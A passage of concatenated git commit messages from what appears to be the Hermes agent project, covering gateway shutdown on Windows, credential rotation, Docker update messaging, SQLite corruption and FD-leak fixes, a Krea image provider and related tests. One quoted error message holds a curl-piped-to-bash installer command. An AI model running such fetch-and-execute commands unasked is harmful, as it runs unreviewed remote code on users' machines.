2. The bigger reason: `asyncio.add_signal_handler` raises
NotImplementedError for SIGTERM/SIGINT on Windows, so even if the
marker had been written, the gateway's existing SIGTERM handler
(which is what calls `runner.stop()` and the `mark_resume_pending`
loop) was never invoked. Writing the marker would have been
necessary-but-insufficient.
The fix has two parts:
* gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls
for the planned-stop marker file every 0.5s. When the marker appears
it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the
same shutdown path a real SIGTERM would have driven, including the
pre-drain `mark_resume_pending` writes (run.py:5977) and graceful
drain wait. The existing signal handler already accepts
`received_signal=None` and falls through to
`consume_planned_stop_marker_for_self()`, so no handler changes
needed. Runs on every platform as cheap belt-and-suspenders.
* hermes_cli/gateway_windows.py: `stop()` now writes the marker for
the running gateway PID and waits up to `agent.restart_drain_timeout`
(default 30s) for the PID to exit cleanly. On clean drain, the kill
sweep is non-forceful; on timeout, escalates to
`kill_gateway_processes(force=True)` which routes to taskkill /T /F
per `references/windows-native-support.md`.
Validation:
* 7 new tests in tests/gateway/test_planned_stop_watcher.py covering:
marker→handler dispatch, no-marker idle, already-draining skip,
not-yet-running skip, stop_event responsiveness, fire-once
semantics, error tolerance.
* 8 new tests in tests/hermes_cli/test_gateway_windows.py covering:
marker-before-kill ordering, clean-drain skips force-kill,
drain-timeout escalates to force=True, no-pid-skips-drain,
invalid-pid handling, fast-exit success, timeout failure,
marker-write-failure tolerance.
* E2E (Linux, detached orphan): write_planned_stop_marker(pid) +
`_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the
victim sees the marker and exits. Tested with a double-forked
subprocess so the test parent isn't holding it as a zombie.
* Targeted: tests/gateway/{restart_drain,restart_resume_pending,
signal,signal_format,status,shutdown_forensics,approve_deny_commands,
planned_stop_watcher} + tests/hermes_cli/{gateway_windows,
gateway_service} → 519/519.
What was wrong with the reporter's claim (for future archaeology): they
described the symptom as "no `resume_pending=True` written to
`sessions.json`" — but Hermes uses `state.db` (SQLite), not
`sessions.json`, and `mark_resume_pending` is called regardless of
the marker (the marker only affects exit code 0 vs 1 for systemd
revival semantics). The real session-loss path is the missing drain
on Windows, not a missing marker. Both halves are fixed here.
Closes#33778.
get_retry_credential only triggered on 401; a 429 Too Many Requests from
xAI was silently streamed back with no key rotation or back-off signal.
- server.py: widen retry gate from == 401 to in {401, 429}
- xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate
to stamp the 1-hour cooldown on the rate-limited key and return the
next available credential. Returns None if pool is exhausted.
Condenses the substance of PRs #16453, #17453, #16451, #17600, and #13373
into a minimal generic host contract that external context engine plugins
(e.g. hermes-lcm) need to integrate cleanly. Drops scaffolding that
duplicated existing infrastructure or had marginal value.
Five concrete changes:
1. `_transition_context_engine_session()` on AIAgent — generic lifecycle
helper that fires on_session_end → on_session_reset → on_session_start
→ optional carry_over_new_session_context. Engines implement only the
hooks they need; missing hooks are skipped. Built-in compressor keeps
its existing reset-only behavior because callers default to no
metadata. `reset_session_state()` now optionally accepts
previous_messages / old_session_id / carry_over_context and delegates
to the transition helper when provided. (#16453)
2. `conversation_id` passed to `on_session_start()` — both the
agent-init call site and the compression-boundary call site now
forward `self._gateway_session_key` so plugin engines have a stable
conversation identity that survives session_id rotation (compression
splits, /new, resume). The key already existed on AIAgent; it just
wasn't reaching engines. (#16453)
3. Canonical cache buckets forwarded to engines — the usage dict passed
to `update_from_response()` now includes input_tokens, output_tokens,
cache_read_tokens, cache_write_tokens, and reasoning_tokens on top of
the legacy prompt/completion/total keys. Engines can make decisions on
cache-hit ratios and reasoning costs instead of only aggregates. ABC
docstring updated. (#17453)
4. Plugin-registered context engines visible in the picker —
`_discover_context_engines()` in plugins_cmd.py now also includes
engines registered via `ctx.register_context_engine()` from plugin
manifests, deduplicating by name so repo-shipped descriptions win on
collision. (#16451)
5. `_EngineCollector.register_command()` — context engines using the
standard `register(ctx)` pattern can now expose slash commands (e.g.
`/lcm`). Routes to the global plugin command registry with the same
conflict-rejection policy regular plugins use (no shadowing built-ins,
no clobbering other plugins). Previously these calls hit a no-op and
the slash commands silently never appeared. (#17600)
Dropped from the original 5 PRs:
- Compression boundary signal (`boundary_reason="compression"`) from
#16453 — already on main at `agent/conversation_compression.py:412-424`,
landed via the bg-review extraction.
- `discover_plugins()` before fallback in run_agent.py from #16451 —
redundant: `get_plugin_context_engine()` already routes through
`_ensure_plugins_discovered()` which is idempotent.
- Runtime identity diagnostics method + helpers from #13373 (+251 LOC) —
operators can already read engine state via `engine.get_status()`;
the diagnostics view added marginal value relative to its surface area.
- The 553-LOC slash-command machinery from #17600 — replaced with a
20-LOC `register_command` method on the collector that reuses the
existing plugin command registry instead of building a parallel one.
Net: ~215 LOC of host-contract changes + 282 LOC of focused tests, vs
~1,176 LOC across the original 5 PRs.
Co-authored-by: Tosko4 <1294707+Tosko4@users.noreply.github.com>
Closes#16453.
Closes#17453.
Closes#16451.
Closes#17600.
Closes#13373.
Related: stephenschoettler/hermes-lcm#68.
#33164 made _save_codex_tokens sync the singleton-seeded `device_code`
pool entry on Codex OAuth re-auth. That fixed the #33000 path but missed
`manual:device_code` entries created by `hermes auth add openai-codex`
(the recommended workaround for users who hit #33000 before #33164
landed).
Every subsequent re-auth would refresh the device_code entry but leave
the manual:device_code entry holding the consumed refresh token plus
stale last_error_* markers — immediately recreating the 401
token_invalidated symptom on the next request, exactly as reported in
#33538.
Extend the refreshable source set to include `manual:device_code`.
Completing the device-code OAuth flow proves the user owns the ChatGPT
account, so it is safe to refresh every device-code-backed entry. Keep
`manual:api_key` and other non-device-code manual sources untouched —
those represent independent credentials.
Closes#33538.
Inside the published Docker image, `hermes update` was hitting the
".git missing → reinstall via curl" fallback:
✗ Not a git repository. Please reinstall:
curl -fsSL https://raw.githubusercontent.com/.../install.sh | bash
That message is wrong on two counts:
1. It tells the user to run the host-side installer, which would
install a *new* Hermes on the host — not update the running
container.
2. It doesn't mention `docker pull` at all, leaving Docker users
to figure out the right action from scratch.
`hermes update --check` was worse: it bailed with "Not a git
repository — cannot check for updates." and nothing else.
Fix: detect the Docker install method (already stamped by
`docker/stage2-hook.sh` and surfaced by `detect_install_method()`)
in both update entry points and print a long-form message that
covers:
- The right command: `docker pull nousresearch/hermes-agent:latest`
- Restart guidance (`docker compose up -d --force-recreate` /
re-run `docker run`)
- How to verify the new version after restart
- Tag-pinning caveat (`:latest` doesn't move a pinned tag)
- Config persistence across upgrades (state under `HERMES_HOME` /
`/opt/data` is bind-mounted and survives)
- Fork escape hatch (build your own image with the repo's Dockerfile)
Exit code is 1 (matches `managed_error` semantic for "tried to
update but can't update this way").
Plumbing:
- hermes_cli/config.py: new `format_docker_update_message()` helper
sits next to the existing `_NIX_UPDATE_MSG` /
`format_managed_message()` family so the wording lives in one
place and both call sites (apply path + check path) consume it.
- hermes_cli/main.py:
* `cmd_update()`: bail right after the `is_managed()` gate, before
any of the apply-path branches.
* `_cmd_update_check()`: bail at the top of the function, before
the existing `method == "pip"` branch.
Neither path touches subprocess.run / git when method == "docker".
Coverage:
- 7 new tests in `tests/hermes_cli/test_cmd_update_docker.py`:
* `hermes update` in Docker → message + exit 1, no git calls
* `hermes update --check` (via cmd_update) → same
* `--yes` / `--force` don't bypass (intentional)
* `_cmd_update_check` called directly → bails too
* git/pip installs still take their normal paths (regression guards)
* `format_docker_update_message` content-lock test pinning the
five user-actionable bits the message must contain
- Existing test_cmd_update.py (21 tests) + test_managed_installs.py
(5 tests) still pass — no regression on the source-install path.
- Verified end-to-end in a real container: `docker run ... update`
and `docker run ... update --check` both render the message and
exit 1.
`hermes dump` and the startup banner both call `git rev-parse HEAD` to
report the running commit, but `.dockerignore` line 2 excludes `.git` —
so inside the published image `hermes dump` shows
`version: ... [(unknown)]` and the banner drops its `· upstream <sha>`
suffix entirely. That makes support triage from container bug reports
impossible: we can't tell which commit the user is actually running.
Fix: thread the build-time SHA through as a Docker build-arg, write it
to `/opt/hermes/.hermes_build_sha` in the image, and have a new
`hermes_cli/build_info.get_build_sha()` read it as a fallback after the
existing live-git lookup fails. Output format is unchanged in both
callsites — same 8-char short SHA whether resolved live or baked.
Wiring:
- Dockerfile: `ARG HERMES_GIT_SHA=` + write-file step after the source
copy. Empty/missing arg → no file written → callers fall through to
live git (so local `docker build` without --build-arg is unchanged).
- docker-publish.yml: passes `HERMES_GIT_SHA=${{ github.sha }}` on all
four build-push-action steps (amd64/arm64, smoke-test + final push).
- dump.py:_get_git_commit() / banner.py:get_git_banner_state(): try
live git first, fall back to baked SHA, then to legacy `(unknown)`
/ None. Banner returns `upstream == local, ahead=0` because a built
image is by definition pinned to one commit.
Coverage:
- Unit tests cover build_info (file present/absent/empty/error,
truncation, whitespace), dump (live-git wins, both fallbacks,
identical output-format regression guard), and banner (no-repo +
baked, no-repo + no-sha, shallow-clone fallback).
- tests/docker/test_dump_build_sha.py is an integration regression
guard that runs against the real image, reads
`/opt/hermes/.hermes_build_sha`, and asserts `hermes dump` surfaces
its content (or stays at `(unknown)` if no file).
- Verified end-to-end: `docker build --build-arg HERMES_GIT_SHA=abc...`
→ `docker run ... dump` reports `[abc12345]`; without the build-arg
it reports `[(unknown)]` as before.
`sqlite3.Connection.__exit__` commits/rollbacks but does NOT close the
underlying FD. `with kb.connect() as conn:` in long-lived processes
(gateway `run_slash`, dashboard `decompose_task_endpoint`) therefore
leaks one FD to `kanban.db` per call. After enough operations the
gateway dies with `[Errno 24] Too many open files` (~4 days uptime
in the production report — #33159).
Fix: add a `connect_closing()` context manager in `hermes_cli/kanban_db`
that wraps `connect()` with a real `try/finally: conn.close()`. Switch
the 42 leak-prone call sites in `hermes_cli/kanban.py` (35),
`hermes_cli/kanban_decompose.py` (4), and `hermes_cli/kanban_specify.py`
(3) over to it.
`kanban.py` matters because `run_slash` (called from the gateway for
every `/kanban` slash command) parses argparse and dispatches to those
`_cmd_*` functions in-process — each one was leaking one FD per
invocation.
Tests inside `tests/` are untouched: short-lived processes where OS
cleanup masks the leak. Regression tests added in
`test_kanban_db.py` cover both happy-path and exception-path closure,
plus an explicit assertion that bare `with kb.connect()` still does
NOT close (documenting the upstream sqlite3 behaviour we're working
around).
Closes#33159.
Follow-up to #33583 (the gateway-run-supervised redirect).
Before this fix, the supervised gateway's stdout (most visibly the
"Hermes Gateway Starting…" rich-console banner) was swallowed by
`s6-log` into the rotated file at
`${HERMES_HOME}/logs/gateways/<profile>/current` and never reached
`docker logs`. Operational signal lived in two places:
* **docker logs** — saw stderr (Python `logging` defaults to
stderr), so warnings/errors were visible.
* **the rotated file** — saw stdout (rich banners, `print()`
output, third-party libs that wrote to fd 1).
This was surprising for users coming from the pre-s6 image, where
`docker run … gateway run` produced a single unified stream in
`docker logs`. They'd see partial output, conclude something was
broken, and dig around for the missing pieces.
Fix: add the `1` s6-log action directive before the file destination
so each line is forwarded to s6-log's stdout — which propagates up
the s6-supervise pipeline to /init's stdout = container stdout =
`docker logs`. The file destination is preserved as a second
destination, so the rotated log (with ISO 8601 timestamps) still
exists for `hermes logs` and for survival across container restarts.
Trade-off considered: timestamps. Putting `T` between `1` and the
file destination (not before `1`) means:
* docker logs sees raw lines — Python's logging formatter has its
own timestamps, and `docker logs --timestamps` adds another
layer when desired. No double-stamping in the common reading
path.
* The persisted file gets s6-log's ISO 8601 timestamp so even
output that lacked a Python-logger timestamp (rich banners,
third-party raw prints) is correlatable in `current`.
Verification:
* New unit-test assertion in `test_service_manager.py` locks the
`s6-log 1` directive into the rendered run-script. Mutation-
tested by reverting to the pre-fix script (no `1`); the assert
catches it cleanly.
* New docker-harness test `test_supervised_gateway_stdout_reaches_docker_logs`
builds the image, runs `docker run … gateway run`, and asserts
the unique `⚕` banner glyph reaches `docker logs`. Also verifies
the rotated file still contains the banner (no regression on
the existing file destination). Mutation-tested end-to-end: built
a deliberately-broken image without the `1` directive and the
test failed exactly as designed, citing the banner present in
`current` but absent from `docker logs`.
* `website/docs/user-guide/docker.md` gains a new `:::note Where
gateway logs go` admonition documenting both destinations and
the audit-log file at `${HERMES_HOME}/logs/container-boot.log`.
Existing functionality preserved: every other docker-harness test
still passes against the new image. Unit-test sweep across
`tests/hermes_cli/` (5561 tests) is green.
* fix(tui): suppress mouse-residue leaks during Python launcher startup
`hermes --tui …` spends ~100–300ms inside the Python launcher (lazy
imports, arg parsing, session resolution) before exec'ing the Node TUI
binary. During that window stdin is still in cooked + echo mode. If a
prior session left DEC mouse tracking asserted (or the user spammed
mouse movement while the previous session was opening), the terminal
keeps emitting `\\x1b[<…M` SGR motion reports that get echoed straight
back into the user's shell scrollback as literal `^[[<…M` text and
sit there above the TUI banner until the next clear.
The Node side already calls `resetTerminalModes()` in `entry.tsx`, but
by then the race is already lost — the bytes echoed during the Python
warmup window were committed to the scrollback before Node started.
Fix: write the mouse-tracking disable sequence at the very top of
`hermes_cli.main`, before every heavy import. The terminal stops
emitting motion events as soon as the bytes hit the wire (one TTY
round-trip), shrinking the race window from hundreds of milliseconds
to a few. `HERMES_TUI_NO_EARLY_DISABLE=1` opts out for diagnostics.
* test(tui): drop dead _reload_main, hoist import out of patch context
Addresses Copilot review on PR #31213.
The tests used to import `hermes_cli.main` inside the `patch("os.write")`
context, which Copilot pointed out is order-dependent: if the module
is already loaded (e.g. imported by a prior test in the same process),
the import is a no-op and the patch only sees the explicit
`_suppress_mouse_residue_early()` call. Either way the assertion can
flake when run alongside other tests.
Move the import to module scope — every subprocess gets a fresh
`hermes_cli.main`, whose module-level invocation is a no-op under
pytest argv. Tests then exercise `_suppress_mouse_residue_early()`
directly inside their own patch context. Also drop the unused
`_reload_main` helper.
* fix(tui): skip early mouse-disable when stdout is not a TTY
Addresses Copilot review on PR #31213.
`hermes --tui … >log` or CI capture pipes fd 1 away from the terminal.
The disable bytes can't reach the terminal in that case but would
still get written into the log file as raw CSI sequences. Guard with
`os.isatty(1)` inside the existing `try/except OSError` block so the
'never break startup' contract holds.
* docs(tui): rephrase 'raw cooked mode' as 'cooked + echo mode'
Copilot review nit on PR #31213 — the original wording was self-
contradictory. Pre-TUI stdin state is cooked + echo (kernel TTY
discipline still owns the line buffer and echoes input back). The
TUI switches it to raw mode later when Ink mounts.
Pre-s6, `docker run nousresearch/hermes-agent gateway run` was the
standard invocation: gateway ran as the container's main process,
tini reaped zombies, container exit code matched gateway exit code,
no supervision. With s6-overlay as PID 1, the same invocation now
auto-upgrades to supervised semantics — auto-restart on crash,
dashboard supervised alongside (when HERMES_DASHBOARD=1 is set),
multiple profile gateways under the same /init.
Users get the new behavior with zero changes to their docker run
command. A loud one-line breadcrumb on stderr explains the upgrade
and points at the opt-out for users who genuinely want pre-s6
foreground semantics.
How it works:
1. `_gateway_command_inner` (the `gateway run` handler) checks if
we're inside a container with s6 as PID 1.
2. If yes, dispatches `start` to the s6 service manager (registers
and starts gateway-default), then `exec sleep infinity` to keep
the CMD process alive without binding container lifetime to
gateway PID lifetime. The supervised gateway can flap freely;
`docker stop` still tears everything down via /init stage 3.
3. If no, falls through to the existing foreground code path
unchanged. Host runs of `hermes gateway run` are unaffected.
Three gates make the redirect inert outside the intended scope:
* `detect_service_manager() != "s6"` — host/non-s6-container runs.
* `HERMES_S6_SUPERVISED_CHILD=1` env var (recursion guard) —
exported by `S6ServiceManager._render_run_script` for the
s6-supervised invocation itself. Without this guard, the
supervised `gateway run --replace` would re-enter the redirect
and recurse (run → start → run → start → ...) infinitely.
* `--no-supervise` CLI flag OR `HERMES_GATEWAY_NO_SUPERVISE=1` env
var — explicit user opt-out for CI smoke tests, debugging the
foreground startup path, or any case wanting "CMD exit =
container exit" semantics. Strict truthiness (1/true/yes,
case-insensitive); typos like `=0` do NOT silently opt out.
Tests:
* Unit tests in tests/hermes_cli/test_gateway_s6_dispatch.py
cover all five paths (host no-op, supervised fire, sentinel
recursion guard, CLI flag, env var truthy + falsy). The two
load-bearing gates (sentinel + opt-out) were mutation-tested
by removing each gate in isolation and confirming the dedicated
test fails with the expected error.
* Docker harness tests in tests/docker/test_gateway_run_supervised.py
cover the round trips end-to-end against a built image: redirect
fires (sleep-infinity heartbeat + supervised gateway-default
slot + breadcrumb), --no-supervise opt-out (foreground gateway,
no want-up on the slot), HERMES_GATEWAY_NO_SUPERVISE env var
works identically, recursion is impossible (≤1 supervised
python gateway-run + exactly 1 sleep-infinity parented to the
CMD wrapper), and HERMES_DASHBOARD=1 produces both supervised
gateway and supervised dashboard.
Docs:
* Added a `:::tip Gateway runs supervised` admonition near the
main docker.md example explaining the upgrade and pointing at
the opt-out. Pre-s6 (tini-based) images still run gateway run
as the foreground main process, so the note is scoped to the
s6 image only.
Trade-off documented in the helper docstring: container exit code
under the redirect is sleep's exit code (always 0 on SIGTERM), not
the gateway's. That was an explicit design call — the supervised
gateway is allowed to flap without taking the container with it,
which is what "supervision" means. CI users who want exit-code
forwarding can pass --no-supervise.
Reaper now runs at the top of every dispatcher tick regardless of per-board connect() failures. Previously the reaper sat inside dispatch_once after the kanban_db.connect() call — any EIO during connect would skip reaping for that tick, accumulating zombie workers and stale claim_lock rows.
Also: reap_worker_zombies now returns the list of reaped pids (the dispatcher logs them) and a test indentation fix.
Squashes three sibling commits from PR #32301 into one logical change for batch review.
Reads header bytes 28-31 after every COMMIT and compares against actual file size. Raises sqlite3.DatabaseError on torn-extend (actual_pages < page_count). Also sets PRAGMA wal_autocheckpoint=100 in connect().
Refs: #31208 (Bug E - same file, coordinate), #30973 (wal_autocheckpoint)
Refs: #30445, #30896, #30908 (corruption reports)
`detect_crashed_workers` calls `_pid_alive` on every `running` task whose
claim is held by this host. The check can transiently return False for a
freshly-spawned worker (fork → /proc-visibility lag, or reap-race
between SIGCHLD and parent reaping). When a second dispatcher ticks
inside that window it reclaims the task and spawns a duplicate worker.
Add `DEFAULT_CRASH_GRACE_SECONDS = 30` and an
`HERMES_KANBAN_CRASH_GRACE_SECONDS` env-var override.
`detect_crashed_workers` skips the liveness check when
`time.time() - started_at < grace`. The existing 15-minute claim TTL
still reclaims genuinely-crashed workers; grace only suppresses the
launch-window false positive.
`HERMES_KANBAN_CRASH_GRACE_SECONDS=0` is set on the `kanban_home`
fixture in `test_kanban_core_functionality.py` so existing tests that
assert immediate reclaim retain pre-fix semantics.
Companion to merged PR #23442 (`release_stale_claims`, closes#23025),
which addressed the same multi-dispatcher race in the stale-claim path.
Related: #20015 (`_pid_alive` false-negative behaviour),
When code inside a write_txn block raises an OperationalError that SQLite
has already auto-rolled-back (typical for disk I/O error,
database is locked, and database disk image is malformed), the
explicit ROLLBACK in write_txn.__exit__ itself raises
cannot rollback - no transaction is active and the secondary exception
replaces the original in the traceback. Operators see a misleading error
and lose the diagnostic information they need.
Swallow the rollback-time OperationalError so the caller always sees the
original cause.
Confirmed reproducer: tests/hermes_cli/test_kanban_db.py::
test_write_txn_preserves_original_exception_when_rollback_fails
Production corruption #6 left b-tree pages with zeroed headers but intact old cell content — the Bug E pattern. This fix applies three pragma calls on every connect():
- synchronous=FULL (was NORMAL): closes the WAL-checkpoint reordering window where a crash between WAL commit and main-DB write leaves a partially-written b-tree page header. Cost is <1ms per commit on local SSD; negligible at kanban write volume.
- secure_delete=ON: forces SQLite to zero freed page bytes on disk. If a torn write or hardware fault later corrupts a page, the underlying cell content is zero, so corruption is detectable and no stale rows can resurface as live data.
- cell_size_check=ON: adds a read-side guard so corrupt cells surface as errors at read time rather than as silent wrong-data returns.
All three are connection-scoped and re-applied on every connect(). secure_delete also writes a persistent flag into the DB header on the first call against a fresh DB, making the protection durable across processes for new DBs.
Tests added for all four required cases: each pragma active on a fresh connection, and all three re-applied after close+reopen. Also adds the required negative test (migration path does not reset pragmas).
The upstream sync logic only ran after a successful origin pull,
so forks whose origin/main was already in sync with local (but
behind upstream/main) would bail out with "Already up to date!"
without ever checking upstream.
DEFAULT_CODEX_MODELS shipped three slugs that the chatgpt.com Codex
backend rejects with HTTP 400 'The <slug> model is not supported when
using Codex with a ChatGPT account.' on every account tested live:
gpt-5.2-codex
gpt-5.1-codex-max
gpt-5.1-codex-mini
Live verified against https://chatgpt.com/backend-api/codex/models
which returns gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.3-codex,
gpt-5.3-codex-spark, gpt-5.2 for ChatGPT Pro accounts.
When _fetch_models_from_api fell back to DEFAULT_CODEX_MODELS (offline
first-run, transient API failure) the picker surfaced these dead slugs
and crashed on selection. The forward-compat synthesis table chained
them downstream too.
If OpenAI re-enables them on the OAuth-backed Codex backend, live
discovery will pick them up automatically — the defaults list is only
consulted when live discovery is unavailable.
Test fixture pivoted to use gpt-5.3-codex (templated by 4 entries) as
the synthesis driver so the forward-compat test still exercises the
synthesis path.
* feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large)
New built-in image_gen backend wrapping Krea's Krea 2 foundation
image model family. Auto-discovered like the other image_gen plugins
and appears in 'hermes tools' → Image Generation → Krea.
Krea's API is asynchronous — submit returns a job_id, poll /jobs/{id}
until terminal. The provider hides that behind the synchronous
ImageGenProvider.generate() contract: submit, poll every 2s with
light backoff (max 5s), 3-minute ceiling matching Krea's hosted-tool
timeout. Result URL is materialised to $HERMES_HOME/cache/images/
to avoid CDN-expiry 404s downstream (same fix as xAI #26942).
Models:
- krea-2-medium (default — Krea's 'start here' recommendation)
- krea-2-large
Aspect ratios map landscape→16:9, square→1:1, portrait→9:16.
Resolution: 1K (Krea's only current option).
Kwarg passthrough: seed, creativity (raw/low/medium/high), styles,
image_style_references (capped 10), moodboards (capped 1) — matches
Krea's per-request limits. Unknown kwargs are ignored.
Config knobs (config.yaml):
image_gen.provider: krea
image_gen.krea.model: krea-2-medium | krea-2-large
image_gen.krea.creativity: raw | low | medium | high
Env overrides: KREA_API_KEY (required), KREA_IMAGE_MODEL.
KREA_API_KEY is registered in OPTIONAL_ENV_VARS so 'hermes setup'
prompts for it.
31 new tests; image_gen suite + picker + tools_config: 211/211.
* fix(image_gen/krea): address review feedback
- Update KREA_API_KEY setup URL to the canonical token-creation page
(https://www.krea.ai/app/api/tokens). The previous URL returned 404.
- Fail fast on non-retryable HTTP statuses during poll. The previous
loop retried every HTTPError for the full 180s deadline, so an auth
(401), billing (402), forbidden (403), or not-found (404) response
would make image_generate hang for three minutes. Only retry
transient statuses (408/409/425/429/5xx); surface everything else
immediately.
- Add 5 tests covering fail-fast on 401/403/404 and retry on 429/503.
* fix(krea): point users at the real API token dashboard URL
Three call sites linked users to dashboard pages that don't exist:
- hermes_cli/config.py: https://www.krea.ai/app/api/tokens
- plugins/image_gen/krea/__init__.py get_setup_schema: https://www.krea.ai/api-keys
- plugins/image_gen/krea/__init__.py auth_required error: https://www.krea.ai/api-keys
Per Krea's own docs (https://docs.krea.ai/developers/api-keys-and-billing),
the real dashboard URL is https://www.krea.ai/settings/api-tokens. All three
sites now point there.
In profile mode, _load_provider_state previously returned None when a
provider was absent from the profile's auth.json — even if the user had
authenticated at the global root. This broke runtime credential resolvers
that read state directly (resolve_nous_access_token,
resolve_nous_runtime_credentials), causing profiles without their own
nous login to fail with 'Hermes is not logged into Nous Portal' despite
a valid global session.
Push the existing read-only global fallback (already used by
get_provider_auth_state and read_credential_pool) into _load_provider_state
so every caller benefits, and simplify get_provider_auth_state into a thin
wrapper. Writes still target the profile only — profile state continues to
shadow global state on the next read after a per-profile login. Behavior in
classic (non-profile) mode is unchanged because _load_global_auth_store
returns an empty dict.
Adds 5 tests covering the new contract on _load_provider_state directly.
Existing 770 auth/credential/nous tests still pass.